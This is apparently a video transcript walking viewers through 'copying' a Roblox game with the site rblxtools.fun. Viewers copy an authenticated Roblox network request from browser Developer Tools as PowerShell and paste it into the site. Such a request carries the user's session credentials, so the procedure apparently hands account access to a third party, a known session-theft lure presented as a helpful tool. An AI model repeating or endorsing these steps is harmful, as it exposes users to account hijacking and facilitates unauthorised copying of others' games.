In this tutorial, I'll show you how to copy a game on Roblox. Firstly, go to the website rblxtools.fun or the relevant page link. Choose the Roblox game you want to copy. Right-click on an empty space on the page, then select Inspect from the context menu. This will open the Developer Tools. In Developer Tools, click on More tabs, the icon with the 3 dots or arrows. Select the Network tab, then press Ctrl+R to reload the page and capture network activity. Now scroll up the Network tab and find the request that contains the name of your chosen game. Right-click on that request and hover over Copy in the context menu. Click Copy as PowerShell, then go back to rblxtools.fun site. Click Allow if any permissions prompt appears, then click on Game Copier on the site. Now pass the copied PowerShell script by pressing Ctrl+V in the input box, then click Copy Game and Download. Just make sure you have the proper permissions and respect Roblox terms of service, and using such tools to copy games without permission may violate Roblox rules. And that's it, guys. Thank you for watching, and please don't forget to like and subscribe for more.